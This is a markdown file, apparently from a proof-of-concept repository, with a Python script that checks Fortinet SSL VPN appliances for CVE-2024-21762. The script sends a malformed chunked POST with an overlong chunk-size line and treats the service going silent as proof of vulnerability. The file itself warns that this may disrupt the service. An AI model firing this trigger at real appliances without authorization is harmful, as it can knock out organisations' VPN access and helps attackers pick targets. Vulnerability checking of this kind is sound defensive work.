wy876_POC/Fortinet-SSL-VPN-CVE-2024-21762.md


Fortinet-SSL-VPN-CVE-2024-21762

PoC / remote check script (`check-cve-2024-21762.py`)

import socket
import ssl
import sys
def _insecure_tls_context() -> ssl.SSLContext:
    """Build the client TLS context used for every probe.

    Certificate validation is switched off deliberately: the target is an
    appliance that usually presents a self-signed or otherwise untrusted
    certificate, and this script only needs a TLS session, not trust.
    check_hostname must be cleared *before* verify_mode is set to CERT_NONE
    (ssl refuses the opposite order).
    """
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    return ctx


context = _insecure_tls_context()

# Per-connection timeout in seconds (connect, handshake and read). Five
# seconds is enough for most hosts; raise it if you see spurious errors.
# NOTE: the check logic treats "no reply within this window" as the
# vulnerable outcome, so a too-small value produces false positives.
TIMEOUT = 5

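def send_req(host, req):
    """Open a TLS connection to *host*, send *req*, return the first reply bytes.

    Parameters:
        host: ``(hostname, port)`` tuple as accepted by socket.create_connection.
        req:  the raw HTTP request as bytes.

    Returns:
        -1     if the TCP connect or the TLS handshake fails,
        0      if the server accepts the request but sends nothing within
               TIMEOUT (check() reads this silence as the vulnerable outcome),
        bytes  otherwise: up to 2048 bytes of the response.

    Changes from the original PoC: the module-level TIMEOUT is honoured
    instead of a hard-coded 5, the bare ``except`` no longer swallows
    KeyboardInterrupt, a failed handshake is reported as -1 instead of
    crashing the script, sendall() replaces send() so a short write cannot
    truncate the request, and the socket is always closed.
    """
    try:
        sock = socket.create_connection(host, timeout=TIMEOUT)
    except OSError:
        return -1
    try:
        # wrap_socket() performs the handshake; ssl.SSLError is an OSError
        # subclass, so a handshake failure lands here and counts as -1.
        tls = context.wrap_socket(sock)
    except OSError:
        sock.close()
        return -1
    with tls:
        tls.sendall(req)
        try:
            # The wrapped socket inherits TIMEOUT from create_connection().
            return tls.read(2048)
        except socket.timeout:
            return 0
        # A connection reset during the read is deliberately NOT caught: it is
        # neither of the two outcomes check() knows how to classify, and the
        # traceback is more useful than a guessed verdict.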

# Both probes POST to /remote/VULNCHECK with a chunked body; check() fills the
# Host header via str.format(). The request line, headers and the blank line
# ending the header section are shared.
_REQ_HEAD = (
    "POST /remote/VULNCHECK HTTP/1.1\r\n"
    "Host: {}\r\n"
    "Transfer-Encoding: chunked\r\n"
    "\r\n"
)

# Control request: a zero-length last chunk, i.e. an empty, well-formed body.
# check() expects a Fortinet SSL VPN interface to answer it with 403 Forbidden
# and uses it to confirm the service is up before sending anything malformed.
control_req = _REQ_HEAD + "0\r\n\r\n\r\n"

# Check request: identical except for the chunk-size line, which is overlong
# (18 hex digits, value 0xFF). This is the trigger for the chunked-encoding
# bug; an unpatched build stops answering, a patched one replies.
# NOTE(review): presumably the overlong size field overflows the parser's
# chunk-size buffer -- confirm against the vendor advisory before relying
# on a different length.
check_req = _REQ_HEAD + "0000000000000000FF\r\n\r\n"
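def check(host):
    """Probe *host* for CVE-2024-21762 and return a one-word verdict.

    Two requests go to /remote/VULNCHECK:
      1. control_req -- a well-formed chunked POST. A Fortinet SSL VPN
         interface is expected to answer 403 Forbidden; anything else only
         prints a warning, the probe still continues.
      2. check_req   -- the same POST with an overlong chunk-size line.
         A patched build answers it; an unpatched build goes silent, which
         send_req() reports as 0.

    Parameters:
        host: ``(hostname, port)`` tuple.

    Returns one of "Connection Failed", "Control request failed",
    "Vulnerable" or "Patched".

    Fixes over the original PoC: the dead ``return`` after the control
    failure is gone; the warning goes to stderr so stdout carries only the
    verdict; and a failed *second* connection is no longer reported as
    "Patched" (a false negative), but as "Connection Failed".
    """
    baseurl = "https://{}:{}".format(*host)
    # NOTE(review): the full URL (scheme included) ends up in the Host header.
    # That is not what RFC 7230 specifies, but it is what the original PoC
    # sends and the 403 check is known to work with it, so it is kept as-is.
    r1 = send_req(host, control_req.format(baseurl).encode())
    if r1 == -1:
        return "Connection Failed"
    if r1 == 0:
        return "Control request failed"
    if b"HTTP/1.1 403 Forbidden" not in r1:
        print("[warning] Server does not look like a Fortinet SSL VPN interface",
              file=sys.stderr)
    r2 = send_req(host, check_req.format(baseurl).encode())
    if r2 == -1:
        # No evidence either way (e.g. transient network error); do not
        # report it as "Patched".
        return "Connection Failed"
    # Silence within TIMEOUT is the only signal of vulnerability this check has.
    return "Vulnerable" if r2 == 0 else "Patched"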

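if __name__ == "__main__":
    # CLI entry point: check-cve-2024-21762.py <host> <port>
    # Usage errors go to stderr with exit status 2 so the verdict on stdout
    # can be consumed by other tooling (the original printed usage to stdout
    # and exited 0, and its bare ``except`` also swallowed KeyboardInterrupt).
    usage = "Usage: check-cve-2024-21762.py <host> <port>"
    if len(sys.argv) < 3:
        print(usage, file=sys.stderr)
        sys.exit(2)
    host = sys.argv[1]
    try:
        port = int(sys.argv[2])
    except ValueError:
        print(usage, file=sys.stderr)
        sys.exit(2)
    if not 0 < port <= 65535:
        print("port must be in the range 1-65535", file=sys.stderr)
        sys.exit(2)
    HOST = (host, port)
    print(check(HOST))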

Usage: `python3 check-cve-2024-21762.py <host> <port>` (the port the SSL VPN web interface listens on, commonly 443 or 10443). Note that this is not a passive fingerprint: the second request is the malformed chunked POST itself, and a target is reported as "Vulnerable" precisely because it stops answering within the timeout, which may mean the SSL VPN service was disrupted. Only run it against systems you are authorized to test.